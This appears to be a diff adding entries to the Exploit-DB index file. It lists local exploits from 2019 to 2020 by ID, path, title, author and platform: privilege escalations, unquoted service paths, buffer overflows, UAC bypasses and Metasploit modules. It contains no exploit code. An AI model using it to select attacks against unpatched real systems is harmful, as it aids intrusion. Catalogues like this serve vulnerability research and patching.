+47173,exploits/multiple/local/47173.sh,"Serv-U FTP Server < 15.1.7 - Local Privilege Escalation (2)",2019-01-13,bcoles,local,multiple,
+47174,exploits/multiple/local/47174.sh,"ASAN/SUID - Local Privilege Escalation",2019-01-12,bcoles,local,multiple,
+47176,exploits/windows/local/47176.cpp,"Microsoft Windows 7 build 7601 (x86) - Local Privilege Escalation",2019-07-26,ShivamTrivedi,local,windows,
+47197,exploits/multiple/local/47197.rb,"SilverSHielD 6.x - Local Privilege Escalation",2019-08-01,"Ian Bredemeyer",local,multiple,
+47231,exploits/linux/local/47231.py,"Ghidra (Linux) 9.0.4 - .gar Arbitrary Code Execution",2019-08-12,"Etienne Lacoche",local,linux,
+47238,exploits/windows/local/47238.ps1,"Steam Windows Client - Local Privilege Escalation",2019-08-12,AbsoZed,local,windows,
+47253,exploits/windows/local/47253.cpp,"Microsoft Windows 10 AppXSvc Deployment Service - Arbitrary File Deletion",2019-08-14,"Abdelhamid Naceri",local,windows,
+47258,exploits/windows/local/47258.txt,"Microsoft Windows Text Services Framework MSCTF - Multiple Vulnerabilities",2019-08-15,"Google Security Research",local,windows,
+47306,exploits/windows/local/47306.txt,"Windows 10 - SET_REPARSE_POINT_EX Mount Point Security Feature Bypass",2019-08-26,"Google Security Research",local,windows,
+47307,exploits/linux/local/47307.rb,"Exim 4.87 / 4.91 - Local Privilege Escalation (Metasploit)",2019-08-26,Metasploit,local,linux,
+47321,exploits/android/local/47321.txt,"Canon PRINT 2.5.5 - Information Disclosure",2019-08-30,0x48piraj,local,android,
+47332,exploits/windows/local/47332.py,"ChaosPro 2.0 - SEH Buffer Overflow",2019-09-02,"Jonathan Crosby",local,windows,
+47333,exploits/windows/local/47333.py,"ChaosPro 2.1 - SEH Buffer Overflow",2019-09-02,"Jonathan Crosby",local,windows,
+47334,exploits/windows/local/47334.py,"ChaosPro 3.1 - SEH Buffer Overflow",2019-09-02,"Jonathan Crosby",local,windows,
+47341,exploits/windows/local/47341.txt,"Kaseya VSA agent 9.5 - Privilege Escalation",2019-09-02,NF,local,windows,
+47344,exploits/linux/local/47344.rb,"ktsuss 1.4 - suid Privilege Escalation (Metasploit)",2019-09-03,Metasploit,local,linux,
+47345,exploits/linux/local/47345.rb,"ptrace - Sudo Token Privilege Escalation (Metasploit)",2019-09-03,Metasploit,local,linux,
+47357,exploits/windows/local/47357.py,"Windows NTFS - Privileged File Access Enumeration",2019-09-06,hyp3rlinx,local,windows,
+47377,exploits/windows/local/47377.rb,"Windows 10 - UAC Protection Bypass Via Windows Store (WSReset.exe) (Metasploit)",2019-09-10,Metasploit,local,windows,
+47378,exploits/windows/local/47378.rb,"Windows 10 - UAC Protection Bypass Via Windows Store (WSReset.exe) and Registry (Metasploit)",2019-09-10,Metasploit,local,windows,
+47389,exploits/windows/local/47389.txt,"AppXSvc - Privilege Escalation",2019-09-16,"Gabor Seljan",local,windows,
+47394,exploits/windows/local/47394.py,"docPrint Pro 8.0 - SEH Buffer Overflow",2019-09-16,"Connor McGarr",local,windows,
+47400,exploits/macos/local/47400.md,"macOS 18.7.0 Kernel - Local Privilege Escalation",2019-09-19,A2nkF,local,macos,
+47421,exploits/linux/local/47421.rb,"ABRT - sosreport Privilege Escalation (Metasploit)",2019-09-25,Metasploit,local,linux,
+47429,exploits/windows/local/47429.py,"Mobatek MobaXterm 12.1 - Buffer Overflow (SEH)",2019-09-27,"Xavi Beltran",local,windows,
+47444,exploits/windows/local/47444.py,"DameWare Remote Support 12.1.0.34 - Buffer Overflow (SEH)",2019-10-01,"Xavi Beltran",local,windows,
+47454,exploits/windows/local/47454.md,"Counter-Strike Global Offensive 1.37.1.1 - 'vphysics.dll' Denial of Service (PoC)",2019-09-18,bi7s,local,windows,
+47463,exploits/android/local/47463.txt,"Android - Binder Driver Use-After-Free",2019-10-04,"Google Security Research",local,android,
+47466,exploits/linux/local/47466.c,"logrotten 3.15.1 - Privilege Escalation",2019-10-07,"Wolfgang Hotwagner",local,linux,
+47468,exploits/windows_x86-64/local/47468.py,"ASX to MP3 converter 3.1.3.7 - '.asx' Local Stack Overflow (DEP)",2019-10-07,max7253,local,windows_x86-64,
+47471,exploits/windows/local/47471.txt,"CheckPoint Endpoint Security Client/ZoneAlarm 15.4.062.17802 - Privilege Escalation",2019-10-07,"Jakub Palaczynski",local,windows,
+47477,exploits/windows/local/47477.py,"DeviceViewer 3.12.0.1 - 'add user' Local Buffer Overflow (DEP Bypass)",2019-10-09,"Alessandro Magnosi",local,windows,
+47482,exploits/linux/local/47482.rb,"ASX to MP3 converter 3.1.3.7 - '.asx' Local Stack Overflow (Metasploit_ DEP Bypass)",2019-10-10,max7253,local,linux,
+47490,exploits/windows/local/47490.txt,"National Instruments Circuit Design Suite 14.0 - Local Privilege Escalation",2019-10-11,"Ivan Marmolejo",local,windows,
+47493,exploits/windows/local/47493.txt,"Uplay 92.0.0.6280 - Local Privilege Escalation",2019-10-14,"Kusol Watchara-Apanukorn",local,windows,
+47502,exploits/linux/local/47502.py,"sudo 1.8.27 - Security Bypass",2019-10-15,"Mohin Paramasivam",local,linux,
+47503,exploits/windows/local/47503.txt,"ActiveFax Server 6.92 Build 0316 - 'ActiveFaxServiceNT' Unquoted Service Path",2019-10-15,cakes,local,windows,
+47504,exploits/windows/local/47504.txt,"Lavasoft 2.3.4.7 - 'LavasoftTcpService' Unquoted Service Path",2019-10-16,"Luis MedinaL",local,windows,
+47506,exploits/windows/local/47506.txt,"Zilab Remote Console Server 3.2.9 - 'zrcs' Unquoted Service Path",2019-10-16,cakes,local,windows,
+47507,exploits/linux/local/47507.py,"X.Org X Server 1.20.4 - Local Stack Overflow",2019-10-16,s4vitar,local,linux,
+47508,exploits/windows/local/47508.txt,"LiteManager 4.5.0 - 'romservice' Unquoted Serive Path",2019-10-16,cakes,local,windows,
+47509,exploits/solaris/local/47509.txt,"Solaris xscreensaver 11.4 - Privilege Escalation",2019-10-16,"Marco Ivaldi",local,solaris,
+47510,exploits/windows/local/47510.txt,"Mikogo 5.2.2.150317 - 'Mikogo-Service' Unquoted Serive Path",2019-10-16,cakes,local,windows,
+47521,exploits/windows/local/47521.txt,"BlackMoon FTP Server 3.1.2.1731 - 'BMFTP-RELEASE' Unquoted Serive Path",2019-10-17,"Debashis Pal",local,windows,
+47522,exploits/windows/local/47522.txt,"Web Companion versions 5.1.1035.1047 - 'WCAssistantService' Unquoted Service Path",2019-10-17,"Debashis Pal",local,windows,
+47523,exploits/windows/local/47523.txt,"WorkgroupMail 7.5.1 - 'WorkgroupMail' Unquoted Service Path",2019-10-17,cakes,local,windows,
+47527,exploits/windows/local/47527.txt,"Trend Micro Anti-Threat Toolkit 1.62.0.1218 - Remote Code Execution",2019-10-21,hyp3rlinx,local,windows,
+47529,exploits/solaris/local/47529.txt,"Solaris 11.4 - xscreensaver Privilege Escalation",2019-10-21,"Marco Ivaldi",local,solaris,
+47538,exploits/windows/local/47538.txt,"IObit Uninstaller 9.1.0.8 - 'IObitUnSvr' Unquoted Service Path",2019-10-23,"Sainadh Jamalpur",local,windows,
+47543,exploits/linux/local/47543.rb,"Linux Polkit - pkexec helper PTRACE_TRACEME local root (Metasploit)",2019-10-24,Metasploit,local,linux,
+47549,exploits/windows/local/47549.txt,"JumpStart 0.6.0.0 - 'jswpbapi' Unquoted Service Path",2019-10-28,"Roberto Escamilla",local,windows,
+47551,exploits/windows/local/47551.py,"ChaosPro 2.0 - Buffer Overflow (SEH)",2019-10-28,SYANiDE,local,windows,
+47556,exploits/windows/local/47556.txt,"Intelligent Security System SecurOS Enterprise 10.2 - 'SecurosCtrlService' Unquoted Service Path",2019-10-29,"Alberto Vargas",local,windows,
+47568,exploits/windows/local/47568.py,"WMV to AVI MPEG DVD WMV Convertor 4.6.1217 - Buffer OverFlow (SEH)",2019-10-31,4ll4u,local,windows,
+47570,exploits/windows/local/47570.txt,"OpenVPN Private Tunnel 2.8.4 - 'ovpnagent' Unquoted Service Path",2019-11-01,"Sainadh Jamalpur",local,windows,
+47574,exploits/windows/local/47574.py,"Aida64 6.10.5200 - Buffer Overflow (SEH)",2019-11-04,daejinoh,local,windows,
+47575,exploits/windows/local/47575.txt,"OpenVPN Connect 3.0.0.272 - 'agent_ovpnconnect' Unquoted Service Path",2019-11-04,"Luis Martínez",local,windows,
+47577,exploits/windows/local/47577.txt,"Launch Manager 6.1.7600.16385 - 'DsiWMIService' Unquoted Service Path",2019-11-04,"Gustavo Briseño",local,windows,
+47580,exploits/linux/local/47580.rb,"Micro Focus (HPE) Data Protector - SUID Privilege Escalation (Metasploit)",2019-11-04,Metasploit,local,linux,
+47582,exploits/windows/local/47582.txt,"Blue Stacks App Player 2.4.44.62.57 - _BstHdLogRotatorSvc_ Unquote Service Path",2019-11-05,"Diego Armando Buztamante Rico",local,windows,
+47584,exploits/windows/local/47584.txt,"Network Inventory Advisor 5.0.26.0 - 'niaservice' Unquoted Service Path",2019-11-05,"Samuel DiazL",local,windows,
+47593,exploits/windows/local/47593.txt,"Wacom WTabletService 6.6.7-3 - 'WTabletServicePro' Unquoted Service Path",2019-11-06,"Marcos Antonio León",local,windows,
+47594,exploits/windows/local/47594.txt,"QNAP NetBak Replicator 4.5.6.0607 - 'QVssService' Unquoted Service Path",2019-11-06,"Ivan Marmolejo",local,windows,
+47597,exploits/windows/local/47597.txt,"Adaware Web Companion version 4.8.2078.3950 - 'WCAssistantService' Unquoted Service Path",2019-11-07,"Mariela L Martínez Hdez",local,windows,
+47599,exploits/windows/local/47599.txt,"SolarWinds Kiwi Syslog Server 8.3.52 - 'Kiwi Syslog Server' Unquoted Service Path",2019-11-08,"Carlos A Garcia R",local,windows,
+47601,exploits/android/local/47601.rb,"Android Janus - APK Signature Bypass (Metasploit)",2019-11-08,Metasploit,local,android,
+47604,exploits/windows/local/47604.txt,"_GCafé 3.0  - 'gbClienService' Unquoted Service Path",2019-11-11,4ll4u,local,windows,
+47605,exploits/windows/local/47605.txt,"Alps HID Monitor Service 8.1.0.10 - 'ApHidMonitorService' Unquote Service Path",2019-11-11,"Héctor Gabriel Chimecatl Hernández",local,windows,
+47606,exploits/xml/local/47606.txt,"XML Notepad 2.8.0.4 - XML External Entity Injection",2019-11-11,daejinoh,local,xml,
+47615,exploits/windows/local/47615.txt,"Acronis True Image OEM 19.0.5128 - 'afcdpsrv' Unquoted Service Path",2019-11-12,"Alejandra Sánchez",local,windows,
+47617,exploits/windows/local/47617.txt,"Wondershare Application Framework Service 2.4.3.231 - 'WsAppService' Unquote Service Path",2019-11-12,chuyreds,local,windows,
+47637,exploits/windows/local/47637.txt,"Alps Pointing-device Controller 8.1202.1711.04 - 'ApHidMonitorService' Unquoted Service Path",2019-11-12,"Mario Rodriguez",local,windows,
+47642,exploits/windows/local/47642.txt,"RTK IIS Codec Service 6.4.10041.133 - 'RtkI2SCodec' Unquote Service Path",2019-11-12,chuyreds,local,windows,
+47645,exploits/windows/local/47645.py,"Control Center PRO 6.2.9 - Local Stack Based Buffer Overflow (SEH)",2019-11-12,sasaga92,local,windows,
+47647,exploits/windows/local/47647.txt,"Wondershare Application Framework Service - _WsAppService_  Unquote Service Path",2019-11-12,chuyreds,local,windows,
+47656,exploits/windows/local/47656.txt,"ScanGuard Antivirus 2020 - Insecure Folder Permissions",2019-11-13,hyp3rlinx,local,windows,
+47658,exploits/windows/local/47658.txt,"oXygen XML Editor 21.1.1 - XML External Entity Injection",2019-11-14,"Pablo Santiago",local,windows,
+47660,exploits/windows/local/47660.txt,"Shrew Soft VPN Client 2.2.2 - 'iked' Unquoted Service Path",2019-11-15,D.Goedecke,local,windows,
+47661,exploits/windows/local/47661.txt,"Emerson PAC Machine Edition 9.70 Build 8595 - 'FxControlRuntime' Unquoted Service Path",2019-11-18,"Luis Martínez",local,windows,
+47664,exploits/windows/local/47664.txt,"ASUS HM Com Service 1.00.31 - 'asHMComSvc' Unquoted Service Path",2019-11-18,"Olimpia Saucedo",local,windows,
+47667,exploits/windows/local/47667.txt,"MobileGo 8.5.0 - Insecure File Permissions",2019-11-18,ZwX,local,windows,
+47668,exploits/windows/local/47668.txt,"NCP_Secure_Entry_Client 9.2 - Unquoted Service Paths",2019-11-18,"Akif Mohamed Ik",local,windows,
+47675,exploits/windows/local/47675.txt,"BartVPN 1.2.2 - 'BartVPNService' Unquoted Service Path",2019-11-19,ZwX,local,windows,
+47676,exploits/windows/local/47676.txt,"Studio 5000 Logix Designer 30.01.00 - 'FactoryTalk Activation Service' Unquoted Service Path",2019-11-19,"Luis Martínez",local,windows,
+47684,exploits/windows/local/47684.md,"Microsoft Windows 10 Build 1803 < 1903 - 'COMahawk' Local Privilege Escalation",2019-11-14,TomahawkAPT69,local,windows,
+47685,exploits/windows_x86-64/local/47685.txt,"DOUBLEPULSAR (x64) - Hooking 'srv!SrvTransactionNotImplemented' in 'srv!SrvTransaction2DispatchTable'",2019-11-03,Mumbai,local,windows_x86-64,
+47687,exploits/linux/local/47687.py,"ClamAV < 0.102.0 - 'bytecode_vm' Code Execution",2019-11-02,anonymous,local,linux,
+47695,exploits/windows/local/47695.rb,"Windows - Escalate UAC Protection Bypass (Via dot net profiler) (Metasploit)",2019-11-20,Metasploit,local,windows,
+47696,exploits/windows/local/47696.rb,"Windows - Escalate UAC Protection Bypass (Via Shell Open Registry Key) (Metasploit)",2019-11-20,Metasploit,local,windows,
+47701,exploits/unix/local/47701.rb,"Xorg X11 Server - Local Privilege Escalation (Metasploit)",2019-11-20,Metasploit,local,unix,
+47703,exploits/linux/local/47703.txt,"GNU Mailutils 3.7 - Privilege Escalation",2019-11-21,"Mike Gualtieri",local,linux,
+47705,exploits/windows/local/47705.txt,"ProShow Producer 9.0.3797 - ('ScsiAccess') Unquoted Service Path",2019-11-22,ZwX,local,windows,
+47706,exploits/windows/local/47706.txt,"LiteManager 4.5.0 - Insecure File Permissions",2019-11-22,ZwX,local,windows,
+47708,exploits/macos/local/47708.txt,"macOS 10.14.6 - root->kernel Privilege Escalation via update_dyld_shared_cache",2019-11-22,"Google Security Research",local,macos,
+47710,exploits/windows/local/47710.txt,"Waves MaxxAudio Drivers 1.1.6.0 - 'WavesSysSvc64' Unquoted Service Path",2019-11-25,"Luis Martínez",local,windows,
+47712,exploits/windows/local/47712.txt,"Easy-Hide-IP 5.0.0.3 - 'EasyRedirect' Unquoted Service Path",2019-11-25,"Rene Cortes S",local,windows,
+47713,exploits/windows/local/47713.txt,"Microsoft Windows AppXsvc Deployment Extension - Privilege Escalation",2019-11-25,"Abdelhamid Naceri",local,windows,
+47714,exploits/windows/local/47714.md,"VMware WorkStation 12.5.5 - Virtual Machine Escape",2017-08-08,unamer,local,windows,
+47715,exploits/windows/local/47715.md,"VMware WorkStation 12.5.3 - Virtual Machine Escape",2019-06-06,unamer,local,windows,
+47724,exploits/windows/local/47724.txt,"TexasSoft CyberPlanet 6.4.131 - 'CCSrvProxy' Unquoted Service Path",2019-11-29,"Cristian Ayala G",local,windows,
+47726,exploits/linux/local/47726.sh,"Bash 5.0 Patch 11 -  SUID Priv Drop Exploit",2019-11-29,"Mohin Paramasivam",local,linux,
+47729,exploits/xml/local/47729.txt,"Visual Studio 2008 - XML External Entity Injection",2019-12-02,hyp3rlinx,local,xml,
+47733,exploits/windows/local/47733.txt,"Max Secure Anti Virus Plus 19.0.4.020 - Insecure File Permissions",2019-12-02,hyp3rlinx,local,windows,
+47734,exploits/windows/local/47734.py,"Anviz CrossChex 4.3.12 - Local Buffer Overflow",2019-12-02,"Luis Catarino",local,windows,
+47735,exploits/xml/local/47735.txt,"Microsoft Excel 2016 1901 - XML External Entity Injection",2019-12-02,hyp3rlinx,local,xml,
+47740,exploits/xml/local/47740.txt,"Microsoft Windows Media Center 2002 - XML External Entity MotW Bypass",2019-12-03,hyp3rlinx,local,xml,
+47743,exploits/xml/local/47743.txt,"Microsoft Visual Basic 2010 Express - XML External Entity Injection",2019-12-04,ZwX,local,xml,
+47746,exploits/windows/local/47746.txt,"NETGATE Data Backup 3.0.620 - 'NGDatBckpSrv' Unquoted Service Path",2019-12-05,ZwX,local,windows,
+47747,exploits/windows/local/47747.txt,"Amiti Antivirus 25.0.640 - Unquoted Service Path",2019-12-05,ZwX,local,windows,
+47751,exploits/windows/local/47751.py,"Trend Micro Deep Security Agent 11 - Arbitrary File Overwrite",2019-12-06,"Peter Lapp",local,windows,
+47752,exploits/windows_x86-64/local/47752.js,"Mozilla FireFox (Windows 10 x64) - Full Chain Client Side Attack",2019-12-07,"Axel Souchet",local,windows_x86-64,
+47753,exploits/windows/local/47753.md,"Microsoft Windows - Multiple UAC Protection Bypasses",2019-12-08,valen,local,windows,
+47754,exploits/windows/local/47754.py,"Microsoft Windows - 'WSReset' UAC Protection Bypass (Registry)",2019-09-02,valen,local,windows,
+47755,exploits/windows/local/47755.c,"Microsoft Windows 10 - 'WSReset' UAC Protection Bypass (propsys.dll)",2019-09-20,valen,local,windows,
+47759,exploits/windows/local/47759.py,"SpotAuditor 5.3.2 - 'Base64' Local Buffer Overflow (SEH)",2019-12-09,"Kirill Nikolaev",local,windows,
+47763,exploits/hardware/local/47763.txt,"Inim Electronics Smartliving SmartLAN 6.x - Hard-coded Credentials",2019-12-10,LiquidWorm,local,hardware,
+47775,exploits/windows/local/47775.py,"FTP Commander Pro 8.03 - Local Stack Overflow",2019-12-13,boku,local,windows,
+47779,exploits/linux/local/47779.txt,"Linux 5.3 - Privilege Escalation via io_uring Offload of sendmsg() onto Kernel Thread with Kernel Creds",2019-12-16,"Google Security Research",local,linux,
+47780,exploits/openbsd/local/47780.txt,"OpenBSD 6.x - Dynamic Loader Privilege Escalation",2019-12-16,"Qualys Corporation",local,openbsd,
+47788,exploits/windows/local/47788.py,"AVS Audio Converter 9.1 - 'Exit folder' Buffer Overflow",2019-12-18,ZwX,local,windows,
+47802,exploits/windows/local/47802.py,"Prime95 Version 29.8 build 6 - Buffer Overflow (SEH)",2019-12-23,stresser,local,windows,
+47803,exploits/openbsd/local/47803.rb,"OpenBSD - Dynamic Loader chpass Privilege Escalation (Metasploit)",2019-12-30,Metasploit,local,openbsd,
+47804,exploits/linux/local/47804.rb,"Reptile Rootkit - reptile_cmd Privilege Escalation (Metasploit)",2019-12-30,Metasploit,local,linux,
+47805,exploits/windows/local/47805.rb,"Microsoft UPnP - Local Privilege Elevation (Metasploit)",2019-12-30,Metasploit,local,windows,
+47810,exploits/windows/local/47810.py,"AVS Audio Converter 9.1.2.600 - Stack Overflow (PoC)",2019-12-30,boku,local,windows,
+47812,exploits/windows/local/47812.py,"FTP Navigator 8.03 - Stack Overflow (SEH)",2019-12-30,boku,local,windows,
+47831,exploits/windows/local/47831.txt,"NextVPN v4.10 - Insecure File Permissions",2019-12-31,SajjadBnd,local,windows,
+47818,exploits/windows/local/47818.txt,"Wing FTP Server 6.0.7 - Unquoted Service Path",2019-12-30,"Nawaf Alkeraithe",local,windows,
+47825,exploits/windows/local/47825.py,"Domain Quester Pro 6.02 - Stack Overflow (SEH)",2019-12-30,boku,local,windows,
+47829,exploits/freebsd/local/47829.sh,"FreeBSD-SA-19:02.fd - Privilege Escalation",2019-12-30,"Karsten König",local,freebsd,
+47830,exploits/freebsd/local/47830.sh,"FreeBSD-SA-19:15.mqueuefs - Privilege Escalation",2019-12-30,"Karsten König",local,freebsd,
+47838,exploits/windows/local/47838.txt,"Microsoft Windows .Group File - Code Execution",2020-01-01,hyp3rlinx,local,windows,
+47845,exploits/windows/local/47845.txt,"Plantronics Hub 3.13.2 - Local Privilege Escalation",2020-01-03,Markus,local,windows,
+47852,exploits/windows/local/47852.txt,"Adaware Web Companion 4.9.2159 - 'WCAssistantService' Unquoted Service Path",2020-01-06,ZwX,local,windows,
+47880,exploits/windows/local/47880.cc,"Windows - Shell COM Server Registrar Local Privilege Escalation",2020-01-02,0vercl0k,local,windows,
+47883,exploits/windows/local/47883.txt,"AnyDesk 5.4.0 - Unquoted Service Path",2020-01-07,SajjadBnd,local,windows,
+47896,exploits/xml/local/47896.txt,"MSN Password Recovery 1.30 - XML External Entity Injection",2020-01-09,ZwX,local,xml,
+47897,exploits/windows/local/47897.txt,"TotalAV 2020 4.14.31 - Privilege Escalation",2020-01-10,"Kusol Watchara-Apanukorn",local,windows,
+47905,exploits/windows/local/47905.txt,"Advanced System Repair Pro 1.9.1.7 - Insecure File Permissions",2020-01-13,ZwX,local,windows,
+47908,exploits/windows/local/47908.py,"Allok Video Converter 4.6.1217 - Stack Overflow (SEH)",2020-01-13,antonio,local,windows,
+47910,exploits/windows/local/47910.py,"Allok RM RMVB to AVI MPEG DVD Converter 3.6.1217 - Stack Overflow (SEH)",2020-01-13,antonio,local,windows,
+47915,exploits/windows/local/47915.py,"Microsoft Windows 10 build 1809 - Local Privilege Escalation (UAC Bypass)",2020-01-13,"Nassim Asrir",local,windows,
+47916,exploits/windows/local/47916.txt,"VPN unlimited 6.1 - Unquoted Service Path",2020-01-14,"Amin Rawah",local,windows,
+47932,exploits/solaris/local/47932.c,"SunOS 5.10 Generic_147148-26 - Local Privilege Escalation",2020-01-16,"Marco Ivaldi",local,solaris,
+47933,exploits/windows/local/47933.rb,"Microsoft Windows - CryptoAPI (Crypt32.dll) Elliptic Curve Cryptography (ECC) Spoof Code-Signing Certificate",2020-01-15,"Oliver Lyak",local,windows,
+47935,exploits/windows_x86-64/local/47935.cpp,"Microsoft Windows 10 (19H1 1901 x64) - 'ws2ifsl.sys' Use After Free Local Privilege Escalation (kASLR kCFG SMEP)",2020-01-07,bluefrostsec,local,windows_x86-64,
+47938,exploits/windows/local/47938.py,"Torrent FLV Converter 1.51 Build 117 - Stack Oveflow (SEH partial overwrite)",2020-01-17,antonio,local,windows,
+47940,exploits/windows/local/47940.txt,"Trend Micro Maximum Security 2019 - Arbitrary Code Execution",2020-01-17,hyp3rlinx,local,windows,
+47943,exploits/windows/local/47943.txt,"Trend Micro Maximum Security 2019 - Privilege Escalation",2020-01-17,hyp3rlinx,local,windows,
+47944,exploits/windows/local/47944.rb,"Plantronics Hub 3.13.2 - SpokesUpdateService Privilege Escalation (Metasploit)",2020-01-17,Metasploit,local,windows,
+47945,exploits/xml/local/47945.txt,"Easy XML Editor 1.7.8 - XML External Entity Injection",2020-01-20,"Javier Olmedo",local,xml,
+47950,exploits/windows/local/47950.txt,"NEOWISE CARBONFTP 1.4 - Weak Password Encryption",2020-01-21,hyp3rlinx,local,windows,
+47957,exploits/linux/local/47957.rb,"Reliable Datagram Sockets (RDS) - rds_atomic_free_op NULL pointer dereference Privilege Escalation (Metasploit)",2020-01-23,Metasploit,local,linux,
+47962,exploits/windows/local/47962.c,"Ricoh Printer Drivers - Local Privilege Escalation",2020-01-22,pentagrid,local,windows,
+47965,exploits/windows/local/47965.py,"Torrent 3GP Converter 1.51 - Stack Overflow (SEH)",2020-01-27,boku,local,windows,
+47974,exploits/windows/local/47974.txt,"XMLBlueprint 16.191112 - XML External Entity Injection",2020-01-29,"Javier Olmedo",local,windows,
+47975,exploits/windows/local/47975.c,"Microsoft Windows 10 - Theme API 'ThemePack' File Parsing",2020-01-29,"Eduardo Braun Prado",local,windows,
+47999,exploits/linux/local/47999.txt,"Socat 1.7.3.4 - Heap-Based Overflow (PoC)",2020-02-05,hieubl,local,linux,
+48000,exploits/linux/local/48000.sh,"xglance-bin 11.00 - Privilege Escalation",2020-02-05,redtimmysec,local,linux,
+48009,exploits/windows/local/48009.txt,"ELAN Smart-Pad 11.10.15.1 - 'ETDService' Unquoted Service Path",2020-02-06,ZwX,local,windows,
+48021,exploits/windows/local/48021.rb,"Windscribe - WindscribeService Named Pipe Privilege Escalation (Metasploit)",2020-02-07,Metasploit,local,windows,
+48028,exploits/windows/local/48028.py,"Wedding Slideshow Studio 1.36 - 'Key' Buffer Overflow",2020-02-10,ZwX,local,windows,
+48036,exploits/windows/local/48036.rb,"Ricoh Driver - Privilege Escalation (Metasploit)",2020-02-10,Metasploit,local,windows,
+48039,exploits/windows/local/48039.py,"Torrent iPod Video Converter 1.51 - Stack Overflow",2020-02-11,boku,local,windows,
+48041,exploits/windows/local/48041.py,"DVD Photo Slideshow Professional 8.07 - 'Key' Buffer Overflow",2020-02-11,ZwX,local,windows,
+48043,exploits/windows/local/48043.txt,"freeFTPd v1.0.13 - 'freeFTPdService' Unquoted Service Path",2020-02-11,boku,local,windows,
+48044,exploits/windows/local/48044.txt,"FreeSSHd 1.3.1 - 'FreeSSHDService' Unquoted Service Path",2020-02-11,boku,local,windows,
+48045,exploits/windows/local/48045.txt,"Sync Breeze Enterprise 12.4.18 - 'Sync Breeze Enterprise' Unquoted Service Path",2020-02-11,boku,local,windows,
+48046,exploits/windows/local/48046.py,"DVD Photo Slideshow Professional 8.07 - 'Name' Buffer Overflow",2020-02-11,ZwX,local,windows,
+48048,exploits/windows/local/48048.txt,"Disk Sorter Enterprise 12.4.16 - 'Disk Sorter Enterprise' Unquoted Service Path",2020-02-11,boku,local,windows,
+48049,exploits/windows/local/48049.txt,"Disk Savvy Enterprise 12.3.18 - Unquoted Service Path",2020-02-11,boku,local,windows,
+48050,exploits/windows/local/48050.py,"Wedding Slideshow Studio 1.36 - 'Name' Buffer Overflow",2020-02-11,ZwX,local,windows,
+48052,exploits/linux/local/48052.sh,"Sudo 1.8.25p - 'pwfeedback' Buffer Overflow",2020-02-06,"Dylan Katz",local,linux,
+48054,exploits/windows/local/48054.py,"MyVideoConverter Pro 3.14 - 'Movie' Buffer Overflow",2020-02-12,ZwX,local,windows,
+48055,exploits/windows/local/48055.py,"MyVideoConverter Pro 3.14 - 'Output Folder' Buffer Overflow",2020-02-12,ZwX,local,windows,
+48056,exploits/windows/local/48056.py,"MyVideoConverter Pro 3.14 - 'TVSeries' Buffer Overflow",2020-02-12,ZwX,local,windows,
+48057,exploits/windows/local/48057.txt,"HP System Event Utility - Local Privilege Escalation",2020-02-12,hyp3rlinx,local,windows,
+48060,exploits/windows/local/48060.txt,"OpenTFTP 1.66 - Local Privilege Escalation",2020-02-13,boku,local,windows,
+48068,exploits/windows/local/48068.txt,"HomeGuard Pro 9.3.1 - Insecure Folder Permissions",2020-02-14,boku,local,windows,
+48069,exploits/windows/local/48069.txt,"EPSON EasyMP Network Projection 2.81 - 'EMP_NSWLSV' Unquoted Service Path",2020-02-14,"Roberto Piña",local,windows,
+48070,exploits/windows/local/48070.txt,"SprintWork 2.3.1 - Local Privilege Escalation",2020-02-14,boku,local,windows,
+48071,exploits/windows/local/48071.md,"Windows Kernel  - Information Disclosure",2020-01-27,Bitdefender,local,windows,
+48072,exploits/php/local/48072.php,"PHP 7.0 < 7.4 (Unix) - 'debug_backtrace' disable_functions Bypass",2020-01-30,mm0r1,local,php,
+48075,exploits/windows/local/48075.txt,"HP System Event 1.2.9.0 - 'HPWMISVC' Unquoted Service Path",2020-02-17,"Roberto Piña",local,windows,
+48078,exploits/windows/local/48078.txt,"BOOTP Turbo 2.0.1214 - 'BOOTP Turbo' Unquoted Service Path",2020-02-17,boku,local,windows,
+48079,exploits/windows/local/48079.txt,"MSI Packages Symbolic Links Processing - Windows 10 Privilege Escalation",2020-02-17,nu11secur1ty,local,windows,
+48080,exploits/windows/local/48080.txt,"DHCP Turbo 4.61298 - 'DHCP Turbo 4' Unquoted Service Path",2020-02-17,boku,local,windows,
+48085,exploits/windows/local/48085.txt,"TFTP Turbo 4.6.1273 - 'TFTP Turbo 4' Unquoted Service Path",2020-02-17,boku,local,windows,
+48087,exploits/windows/local/48087.py,"Cuckoo Clock v5.0 - Buffer Overflow",2020-02-17,boku,local,windows,
+48129,exploits/android/local/48129.rb,"Android Binder - Use-After-Free (Metasploit)",2020-02-24,Metasploit,local,android,
+48131,exploits/linux/local/48131.rb,"Diamorphine Rootkit - Signal Privilege Escalation (Metasploit)",2020-02-24,Metasploit,local,linux,
+48148,exploits/windows/local/48148.py,"Cyberoam Authentication Client 2.1.2.7 - Buffer Overflow (SEH)",2020-03-02,"Andrey Stoykov",local,windows,
+48160,exploits/windows/local/48160.py,"Wing FTP Server 6.2.3 - Privilege Escalation",2020-03-02,"Cary Hooper",local,windows,
+48171,exploits/windows/local/48171.txt,"Iskysoft Application Framework Service 2.4.3.241 - 'IsAppService' Unquoted Service Path",2020-03-06,"Alejandro Reyes",local,windows,
+48172,exploits/windows/local/48172.txt,"SpyHunter 4 - 'SpyHunter 4 Service' Unquoted Service Path",2020-03-06,"Alejandro Reyes",local,windows,
+48173,exploits/windows/local/48173.txt,"ASUS GiftBox Desktop 1.1.1.127 - 'ASUSGiftBoxDesktop' Unquoted Service Path",2020-03-06,"Oscar Flores",local,windows,
+48174,exploits/windows/local/48174.txt,"Deep Instinct Windows Agent 1.2.29.0 - 'DeepMgmtService' Unquoted Service Path",2020-03-06,"Oscar Flores",local,windows,
+48180,exploits/windows/local/48180.cpp,"Microsoft Windows - 'WizardOpium' Local Privilege Escalation",2020-03-03,piotrflorczyk,local,windows,
+48185,exploits/linux/local/48185.rb,"OpenSMTPD - OOB Read Local Privilege Escalation (Metasploit)",2020-03-09,Metasploit,local,linux,
+48187,exploits/multiple/local/48187.txt,"Counter Strike: GO - '.bsp' Memory Control (PoC)",2020-03-09,"0day enthusiast",local,multiple,
+48193,exploits/windows/local/48193.txt,"ASUS AXSP 1.02.00 - 'asComSvc' Unquoted Service Path",2020-03-11,"Roberto Piña",local,windows,
+48206,exploits/windows/local/48206.txt,"ASUS AAHM 1.00.22 - 'asHmComSvc' Unquoted Service Path",2020-03-12,"Roberto Piña",local,windows,
+48211,exploits/windows/local/48211.py,"AnyBurn 4.8 - Buffer Overflow (SEH)",2020-03-13,"Richard Davy",local,windows,
